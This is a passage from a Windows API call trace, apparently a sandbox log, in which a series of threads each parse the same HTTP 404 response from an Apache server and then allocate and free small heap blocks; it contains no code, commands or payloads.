out: hHeap=0x690000) returned 1 Thread: id = 74 os_tid = 0x10ac [0187.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.944] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.944] GetProcessHeap () returned 0x690000 [0187.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0187.944] GetProcessHeap () returned 0x690000 [0187.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0187.944] GetProcessHeap () returned 0x690000 [0187.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 75 os_tid = 0x10b8 [0188.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.329] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.329] GetProcessHeap () returned 0x690000 [0188.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0188.329] GetProcessHeap () returned 0x690000 [0188.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0188.329] GetProcessHeap () returned 0x690000 [0188.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 76 os_tid = 0x10c4 [0188.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.559] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.559] GetProcessHeap () returned 0x690000 [0188.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0188.559] GetProcessHeap () returned 0x690000 [0188.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0188.559] GetProcessHeap () returned 0x690000 [0188.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 77 os_tid = 0x10d0 [0188.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.774] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.774] GetProcessHeap () returned 0x690000 [0188.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0188.774] GetProcessHeap () returned 0x690000 [0188.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0188.774] GetProcessHeap () returned 0x690000 [0188.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 78 os_tid = 0x810 [0188.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.957] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.958] GetProcessHeap () returned 0x690000 [0188.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea48 [0188.958] GetProcessHeap () returned 0x690000 [0188.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea48 | out: hHeap=0x690000) returned 1 [0188.958] GetProcessHeap () returned 0x690000 [0188.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 79 os_tid = 0x10e0 [0189.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.197] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.197] GetProcessHeap () returned 0x690000 [0189.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0189.198] GetProcessHeap () returned 0x690000 [0189.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0189.198] GetProcessHeap () returned 0x690000 [0189.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 80 os_tid = 0x10e4 [0189.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.403] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.403] GetProcessHeap () returned 0x690000 [0189.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0189.403] GetProcessHeap () returned 0x690000 [0189.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0189.403] GetProcessHeap () returned 0x690000 [0189.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 81 os_tid = 0x10f8 [0189.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.620] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.620] GetProcessHeap () returned 0x690000 [0189.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0189.620] GetProcessHeap () returned 0x690000 [0189.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0189.620] GetProcessHeap () returned 0x690000 [0189.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 82 os_tid = 0xb4c [0189.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.857] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.857] GetProcessHeap () returned 0x690000 [0189.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0189.857] GetProcessHeap () returned 0x690000 [0189.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0189.857] GetProcessHeap () returned 0x690000 [0189.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 83 os_tid = 0x164 [0190.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.034] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.034] GetProcessHeap () returned 0x690000 [0190.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae940 [0190.034] GetProcessHeap () returned 0x690000 [0190.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae940 | out: hHeap=0x690000) returned 1 [0190.034] GetProcessHeap () returned 0x690000 [0190.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 84 os_tid = 0xcd4 [0190.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.243] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.243] GetProcessHeap () returned 0x690000 [0190.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae910 [0190.243] GetProcessHeap () returned 0x690000 [0190.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae910 | out: hHeap=0x690000) returned 1 [0190.243] GetProcessHeap () returned 0x690000 [0190.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 85 os_tid = 0x428 [0190.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.449] GetProcessHeap () returned 0x690000 [0190.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae910 [0190.449] GetProcessHeap () returned 0x690000 [0190.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae910 | out: hHeap=0x690000) returned 1 [0190.449] GetProcessHeap () returned 0x690000 [0190.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 86 os_tid = 0x724 [0190.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.637] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.637] GetProcessHeap () returned 0x690000 [0190.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae910 [0190.637] GetProcessHeap () returned 0x690000 [0190.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae910 | out: hHeap=0x690000) returned 1 [0190.637] GetProcessHeap () returned 0x690000 [0190.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 87 os_tid = 0xfc4 [0190.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.852] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.852] GetProcessHeap () returned 0x690000 [0190.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0190.852] GetProcessHeap () returned 0x690000 [0190.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0190.852] GetProcessHeap () returned 0x690000 [0190.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 88 os_tid = 0xc6c [0191.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.031] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.032] GetProcessHeap () returned 0x690000 [0191.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0191.032] GetProcessHeap () returned 0x690000 [0191.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0191.032] GetProcessHeap () returned 0x690000 [0191.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 89 os_tid = 0xbd8 [0191.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.219] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.219] GetProcessHeap () returned 0x690000 [0191.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0191.219] GetProcessHeap () returned 0x690000 [0191.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0191.219] GetProcessHeap () returned 0x690000 [0191.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 90 os_tid = 0xa74 [0191.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.417] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.417] GetProcessHeap () returned 0x690000 [0191.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0191.417] GetProcessHeap () returned 0x690000 [0191.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0191.417] GetProcessHeap () returned 0x690000 [0191.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 91 os_tid = 0x390 [0191.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.602] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.602] GetProcessHeap () returned 0x690000 [0191.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0191.602] GetProcessHeap () returned 0x690000 [0191.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0191.602] GetProcessHeap () returned 0x690000 [0191.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 92 os_tid = 0x12d0 [0191.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.844] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.844] GetProcessHeap () returned 0x690000 [0191.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0191.844] GetProcessHeap () returned 0x690000 [0191.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0191.844] GetProcessHeap () returned 0x690000 [0191.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 93 os_tid = 0x2fc [0192.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.058] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.058] GetProcessHeap () returned 0x690000 [0192.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0192.059] GetProcessHeap () returned 0x690000 [0192.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0192.059] GetProcessHeap () returned 0x690000 [0192.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 94 os_tid = 0x110c [0192.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0192.254] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.254] GetProcessHeap () returned 0x690000 [0192.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0192.254] GetProcessHeap () returned 0x690000 [0192.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0192.254] GetProcessHeap () returned 0x690000 [0192.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 95 os_tid = 0x1118 [0193.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.378] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.378] GetProcessHeap () returned 0x690000 [0193.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0193.378] GetProcessHeap () returned 0x690000 [0193.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0193.378] GetProcessHeap () returned 0x690000 [0193.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 96 os_tid = 0x111c [0193.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.572] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.572] GetProcessHeap () returned 0x690000 [0193.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0193.572] GetProcessHeap () returned 0x690000 [0193.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0193.572] GetProcessHeap () returned 0x690000 [0193.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 97 os_tid = 0x1130 [0193.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0193.817] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.817] GetProcessHeap () returned 0x690000 [0193.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0193.817] GetProcessHeap () returned 0x690000 [0193.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0193.817] GetProcessHeap () returned 0x690000 [0193.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 98 os_tid = 0x1134 [0194.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.037] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.037] GetProcessHeap () returned 0x690000 [0194.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea78 [0194.037] GetProcessHeap () returned 0x690000 [0194.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea78 | out: hHeap=0x690000) returned 1 [0194.037] GetProcessHeap () returned 0x690000 [0194.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 99 os_tid = 0x900 [0194.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.237] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.237] GetProcessHeap () returned 0x690000 [0194.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea78 [0194.238] GetProcessHeap () returned 0x690000 [0194.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea78 | out: hHeap=0x690000) returned 1 [0194.238] GetProcessHeap () returned 0x690000 [0194.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 100 os_tid = 0x868 [0194.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.413] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.413] GetProcessHeap () returned 0x690000 [0194.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea78 [0194.413] GetProcessHeap () returned 0x690000 [0194.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea78 | out: hHeap=0x690000) returned 1 [0194.413] GetProcessHeap () returned 0x690000 [0194.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 101 os_tid = 0x1148 [0194.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.673] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.774] GetProcessHeap () returned 0x690000 [0194.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea18 [0194.774] GetProcessHeap () returned 0x690000 [0194.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea18 | out: hHeap=0x690000) returned 1 [0194.774] GetProcessHeap () returned 0x690000 [0194.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 102 os_tid = 0x1150 [0194.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.907] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.907] GetProcessHeap () returned 0x690000 [0194.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0194.907] GetProcessHeap () returned 0x690000 [0194.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0194.907] GetProcessHeap () returned 0x690000 [0194.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 Thread: id = 103 os_tid = 0x115c [0195.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.081] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.081] GetProcessHeap () returned 0x690000 [0195.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0195.081] GetProcessHeap () returned 0x690000 [0195.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0195.081] GetProcessHeap () returned 0x690000 [0195.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 104 os_tid = 0x1170 [0195.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.281] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.281] GetProcessHeap () returned 0x690000 [0195.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0195.281] GetProcessHeap () returned 0x690000 [0195.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0195.281] GetProcessHeap () returned 0x690000 [0195.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 